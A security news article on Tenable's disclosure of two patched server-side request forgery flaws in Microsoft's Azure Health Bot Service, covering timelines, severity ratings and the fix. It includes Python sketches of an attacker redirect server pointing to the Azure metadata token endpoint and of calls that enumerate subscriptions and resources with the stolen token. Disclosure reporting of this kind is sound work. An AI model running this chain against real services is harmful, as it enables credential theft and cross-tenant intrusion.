Severe vulnerabilities have been discovered in Microsoft’s AI healthcare chatbot service, allowing access to user and customer information, according to Tenable researchers.
One of the flaws in the Azure Health Bot Service is rated critical, and the level of access the vulnerabilities granted means lateral movement to other resources was likely possible.
Microsoft has applied mitigations for the discovered vulnerabilities, with no customer action required.
Microsoft AI Chatbot Exploited
The Azure Health Bot Service is a cloud platform that enables healthcare organizations to build and deploy AI-powered virtual assistants to reduce costs and improve efficiency.
While analyzing the service for security issues, Tenable researchers focused on a feature called ‘Data Connections’, which allows bots to interact with external data sources to retrieve information from other services that the provider may be using, such as a portal for patient information.
This data connection feature is designed to allow the service’s backend to make requests to third-party APIs.
While testing these connections to see if they could interact with endpoints internal to the service, the researchers found that issuing redirect responses enabled them to bypass mitigations, such as filtering, on these endpoints.
Two privilege escalation vulnerabilities were uncovered as part of this process.
Critical Privilege Escalation Vulnerability
The first vulnerability detailed by Tenable was a privilege escalation issue exploited via server-side request forgery (SSRF), tracked as CVE-2024-38109.
The researchers configured a data connection within the service's scenario editor, specifying an external host under their control.
They then configured this external host to answer requests with a 301 redirect response pointing to Azure's Instance Metadata Service (IMDS).
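The redirect step can be sketched as a tiny attacker-controlled HTTP server. Everything here (port, handler name) is illustrative rather than Tenable's actual tooling, and details such as the `Metadata: true` header IMDS normally requires are omitted:

```python
# Hypothetical sketch of the attacker-controlled endpoint used in the
# redirect step: every request it receives is answered with a 301
# pointing at the IMDS token endpoint for the management plane.
from http.server import BaseHTTPRequestHandler, HTTPServer

# Real IMDS address; the resource parameter matches the token scope
# described in the article (management.azure.com).
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectToIMDS(BaseHTTPRequestHandler):
    def do_GET(self):
        # Reply with a 301 so the Health Bot backend, which followed
        # redirects at the time, re-issues the request against IMDS.
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), RedirectToIMDS).serve_forever()
```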
After receiving a valid metadata response, the researchers were able to obtain an access token for management.azure.com. This token enabled them to list the subscriptions they had access to via a call to https://management.azure.com/subscriptions?api-version=2020-01-01, which provided them with a subscription ID internal to Microsoft.
Tenable researchers could then list the resources they had access to via https://management.azure.com/subscriptions/<REDACTED>/resources?api-version=2020-10-01, which contained hundreds of resources belonging to other customers.
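The two enumeration calls above can be sketched against the Azure Resource Manager REST API. This is an illustrative sketch, not Tenable's tooling; `token` is assumed to hold the access token obtained from IMDS, and the helper names are hypothetical:

```python
# Illustrative sketch of the subscription and resource enumeration
# described above, using the Azure Resource Manager REST API.
import json
import urllib.request

def management_url(path: str, api_version: str) -> str:
    # Build an Azure Resource Manager URL with the given API version.
    return f"https://management.azure.com{path}?api-version={api_version}"

def management_get(token: str, path: str, api_version: str) -> dict:
    # Perform an authenticated GET against the management plane.
    req = urllib.request.Request(
        management_url(path, api_version),
        headers={"Authorization": f"Bearer {token}"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)

# Hypothetical usage with a stolen token:
# subs = management_get(token, "/subscriptions", "2020-01-01")["value"]
# resources = management_get(
#     token,
#     f"/subscriptions/{subs[0]['subscriptionId']}/resources",
#     "2020-10-01",
# )["value"]
```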
The findings were reported to Microsoft on June 17, 2024, and within a week, fixes were introduced into affected environments. By July 2, fixes were rolled out across all regions.
The fix for this flaw involved rejecting redirect status codes altogether for data connection endpoints, which eliminated this attack vector.
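Microsoft's actual implementation is not public, but the mitigation can be illustrated with a short sketch: fetch a data-connection endpoint without following redirects, and treat any 3xx status as an error.

```python
# Minimal sketch (names illustrative) of rejecting redirect status
# codes outright when fetching a data-connection endpoint.
import urllib.error
import urllib.request

def is_redirect(code: int) -> bool:
    # Any 3xx status counts as a rejected redirect.
    return 300 <= code < 400

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        # Returning None stops urllib from following the redirect;
        # the 3xx response then surfaces as an HTTPError.
        return None

def fetch_data_connection(url: str) -> bytes:
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.read()
    except urllib.error.HTTPError as err:
        if is_redirect(err.code):
            raise ValueError(f"redirect status {err.code} rejected") from err
        raise
```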
Microsoft has assigned this vulnerability a severity rating of Critical, confirming it would provide cross-tenant access. It has been included in Microsoft's August 2024 Patch Tuesday publication.
There is no evidence that the issue was exploited by a malicious actor.
Important Privilege Escalation Vulnerability
After Microsoft fixed the first vulnerability, Tenable researchers found another privilege escalation vulnerability contained in the Data Connections feature of the Azure Health Bot Service.
The researchers exploited the flaw using a similar server-side request forgery technique, this time against the FHIR endpoint data connection type. FHIR (Fast Healthcare Interoperability Resources) prescribes a standard format for accessing electronic medical record resources and the actions performed on them.
This vulnerability was less severe than the IMDS flaw, as it did not provide cross-tenant access.
The flaw was reported to Microsoft on July 9, with fixes made available by July 12. The vulnerability has been rated as Important.
There is no evidence that the issue was exploited by malicious actors.
Prioritizing Security in AI Models
The privilege escalation flaws relate to the underlying architecture of the AI chatbot service rather than the AI models themselves, the researchers noted.
Tenable said that the discoveries highlight the continued importance of traditional web application and cloud security mechanisms for AI-powered services.
In February 2024, Mozilla found that AI-powered “relationship” chatbots are deliberately ignoring privacy and security best practices.